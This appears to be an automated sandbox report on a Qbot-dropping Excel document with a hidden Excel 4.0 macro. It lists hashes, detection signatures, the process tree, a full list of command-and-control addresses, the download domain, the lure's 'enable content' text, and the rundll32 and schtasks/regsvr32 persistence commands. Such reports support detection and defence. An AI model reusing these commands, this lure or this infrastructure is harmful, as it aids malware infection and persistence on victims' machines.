
Analysis Report document-1055791644.xls

Overview

General Information

Sample Name: document-1055791644.xls
Analysis ID: 382839
MD5: a1b03697f4c155ce81cbe1a4d8f87382
SHA1: c38536b8b88cb657f63a5c3ceb83586bd95f1b4b
SHA256: 6083d754351ed13573a015a56de62a51d8755e4ada995406c89abdf5a85e7390
Tags: SilentBuilder, xls

Detection

Hidden Macro 4.0, Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Schedule REGSVR windows binary
Yara detected Qbot
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1432 cmdline: rundll32 ..\iojhsfgv.dvers,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2360 cmdline: rundll32 ..\iojhsfgv.dvers,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • explorer.exe (PID: 2508 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2732 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2760 cmdline: taskeng.exe {E6DEB525-2047-4F0F-A2D9-FEDA7F895D14} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • regsvr32.exe (PID: 2888 cmdline: regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2880 cmdline: -s 'C:\Users\user\iojhsfgv.dvers' MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2364 cmdline: regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2288 cmdline: -s 'C:\Users\user\iojhsfgv.dvers' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Qbot

{"C2 list": ["176.205.222.30:2078", "174.76.188.217:22", "105.226.10.142:443", "87.202.87.210:2222", "203.194.110.74:443", "95.77.223.148:443", "45.77.115.208:2222", "47.146.169.85:443", "76.94.200.148:995", "23.240.70.80:443", "193.252.48.200:443", "154.124.130.140:995", "45.32.211.207:2222", "149.28.98.196:2222", "149.28.98.196:995", "149.28.101.90:995", "207.246.77.75:2222", "45.63.107.192:995", "173.70.165.101:995", "207.246.116.237:995", "149.28.99.97:2222", "149.28.101.90:8443", "207.246.116.237:443", "45.77.115.208:443", "45.32.211.207:8443", "207.246.77.75:8443", "149.28.101.90:443", "45.63.107.192:2222", "207.246.77.75:995", "149.28.99.97:995", "45.32.211.207:443", "144.202.38.185:443", "45.63.107.192:443", "149.28.101.90:2222", "149.28.99.97:443", "45.32.211.207:995", "207.246.116.237:2222", "207.246.116.237:8443", "149.28.98.196:443", "144.202.38.185:2222", "207.246.77.75:443", "144.202.38.185:995", "1.52.227.184:443", "184.189.122.72:443", "201.171.77.138:443", "208.126.142.17:443", "60.50.255.183:443", "172.78.30.215:443", "171.103.138.122:995", "92.59.35.196:2222", "176.181.247.197:443", "82.127.125.209:990", "45.77.115.208:8443", "45.77.115.208:995", "50.29.166.232:995", "172.87.157.235:3389", "85.58.200.50:2222", "196.151.252.84:443", "24.50.118.93:443", "103.51.20.143:2222", "86.236.77.68:2222", "78.63.226.32:443", "82.76.47.211:443", "76.25.142.196:443", "213.60.147.140:443", "151.33.233.193:443", "81.88.254.62:443", "70.126.76.75:443", "160.3.187.114:443", "41.205.16.1:443", "96.61.23.88:995", "86.98.93.124:2078", "2.232.253.79:995", "209.210.187.52:443", "188.25.63.105:443", "115.133.243.6:443", "27.223.92.142:995", "140.82.49.12:443", "80.11.173.82:8443", "2.7.69.217:2222", "190.85.91.154:443", "142.68.28.22:443", "89.211.252.190:995", "178.153.37.196:443", "79.129.121.81:995", "71.88.193.17:443", "86.160.137.132:443", "202.184.20.119:443", "83.110.12.140:2222", "115.69.252.0:22", "105.198.236.101:443", "144.139.47.206:443", 
"105.198.236.99:443", "197.45.110.165:995", "85.132.36.111:2222", "70.168.130.172:995", "71.187.170.235:443", "80.227.5.69:443", "59.90.246.200:443", "81.214.126.173:2222", "68.225.60.77:995", "108.31.15.10:995", "83.110.108.181:2222", "46.153.119.255:995", "216.201.162.158:443", "197.161.154.132:443", "96.21.251.127:2222", "75.136.40.155:443", "24.95.61.62:443", "68.186.192.69:443", "193.248.221.184:2222", "75.67.192.125:443", "81.97.154.100:443", "75.118.1.141:443", "47.22.148.6:443", "182.48.193.200:443", "203.198.96.37:443", "106.51.52.111:443", "83.110.103.152:443", "75.136.26.147:443", "2.50.2.216:443", "189.223.234.23:995", "74.222.204.82:995", "173.21.10.71:2222", "69.123.179.70:443", "71.74.12.34:443", "45.46.53.140:2222", "86.97.162.85:443", "2.51.171.223:443", "144.139.166.18:443", "71.197.126.250:443", "67.6.12.4:443", "122.148.156.131:995", "64.121.114.87:443", "50.244.112.106:443", "70.54.25.76:2222", "1.32.35.2:443", "89.137.211.239:995", "67.165.206.193:993", "186.28.51.27:443", "98.240.24.57:443", "109.12.111.14:443", "71.14.110.199:443", "94.53.92.42:443", "84.247.55.190:8443", "24.27.82.216:2222", "74.68.144.202:443", "196.221.207.137:995", "85.184.63.112:443", "67.8.103.21:443"], "Bot id": "tr", "Campaign": "1612776124"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
document-1055791644.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC | Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4c2a2:$s1: Excel
  • 0x4d2f4:$s1: Excel
  • 0x38f2:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1055791644.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.230174.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
4.2.rundll32.exe.420000.3.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
4.2.rundll32.exe.420000.3.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
4.2.rundll32.exe.230174.1.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
5.2.explorer.exe.80000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security

Sigma Overview

System Summary:

Sigma detected: Schedule REGSVR windows binary
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2508, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54, ProcessId: 2732

Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.rundll32.exe.230174.1.raw.unpack | Malware Configuration Extractor: Qbot (C2 list, Bot id "tr" and Campaign "1612776124", listed in full under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif | Metadefender: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif | ReversingLabs: Detection: 93%
Multi AV Scanner detection for submitted file
Source: document-1055791644.xls | Virustotal: Detection: 51%
Source: document-1055791644.xls | ReversingLabs: Detection: 47%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 103.50.162.157:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00431217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008A4F40 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00091217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 0702[1].gif.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: excel.exe | Memory has grown: Private usage: 4MB later: 46MB
Source: global traffic | DNS query: name: tidymasters.com.au
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 103.50.162.157:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 103.50.162.157:443
Source: Joe Sandbox View | IP Address: 103.50.162.157
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: tidymasters.com.au
Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 0000000A.00000002.2117402574.0000000000A30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2116197122.0000000000D40000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | HTTPS traffic detected: 103.50.162.157:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008BEE8C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008EB0B0 GetKeyboardState,

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
Source: Screenshot number: 4 | Screenshot OCR: Enable Content X I F122 -',- jR V ^ Docu&^, THIS STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUME
Source: Screenshot number: 8 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
Source: Screenshot number: 8 | Screenshot OCR: Enable Content X Al " " jR " ^ Docu&nt THIS STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT,
Source: Screenshot number: 12 | Screenshot OCR: Enable Content X F312 " " jR " A B C D E F G H I J K L M N O P Q R S L=j 301 302 303 304 30
Found Excel 4.0 Macro with suspicious formulas
Source: document-1055791644.xls | Initial sample: EXEC
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\iojhsfgv.dvers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_004350CD MultiByteToWideChar,GetOEMCP,GetOEMCP,lstrcpynA,lstrcpynA,MultiByteToWideChar,lstrcpynA,lstrcpynA,memset,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrcpynA,NtProtectVirtualMemory,GetOEMCP,NtWriteVirtualMemory,GetOEMCP,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,GetOEMCP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00434981 lstrcpynA,GetOEMCP,lstrlenA,lstrlenA,GetCurrentProcessId,lstrlenA,GetOEMCP,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,lstrcpynA,MultiByteToWideChar,NtCreateSection,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,lstrcpynA,GetOEMCP,NtMapViewOfSection,lstrlenA,GetCurrentProcessId,lstrcpynA,GetCurrentProcess,NtUnmapViewOfSection,MultiByteToWideChar,GetOEMCP,NtClose,lstrcpynA,lstrcpynA,VirtualAllocEx,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,WriteProcessMemory,memcpy,MultiByteToWideChar,lstrlenA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008EE02C NtdllDefWindowProc_A,GetCapture,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008DA498 NtdllDefWindowProc_A,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008DACF0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008DAC40 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008C4FB8 NtdllDefWindowProc_A,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008E3C20 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00434981
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_004355A8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00435A4F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043862B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_004343F7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_004340C2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00441488
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043B0AF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00439566
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00440D09
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_004305E8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042F267
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042BA65
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042A60D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00431217
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00433630
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00436AFA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00443AFF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042C6FD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00441E97
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043CABD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043735C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043AB20
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043C7C3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042FBC4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0042DBEC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043BBFA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00431F8B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0043D3B3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008D4990
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008BB03C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_008E3C20
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024C031
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024606E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024A094
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0023F138
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0023D160
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0025027D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024A623
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00243636
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024078B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0023E7DB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024C927
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024396B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_002509FC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00248ADA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00244B1C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00242BA4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00239B81
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00247B9F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0023BC71
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0024BD37
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00243EF5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00244FC3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0023AFD9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008A60D
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0009862B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00093630
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008BA65
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008C6FD
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008FBC4
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000A1488
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0009B0AF
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000940C2
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000A0D09
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00099566
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00094981
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000955A8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000905E8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00091217
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00095A4F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008F267
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000A1E97
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009CABD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00096AFA
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000A3AFF
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009AB20
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009735C
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091F8B
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009D3B3
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009C7C3
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008DBEC
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009BBFA
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000943F7
Source: document-1055791644.xls | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif 63B470971FA827F8E59555C32E966B68EE765120849C23431DD352AEACBBA52B
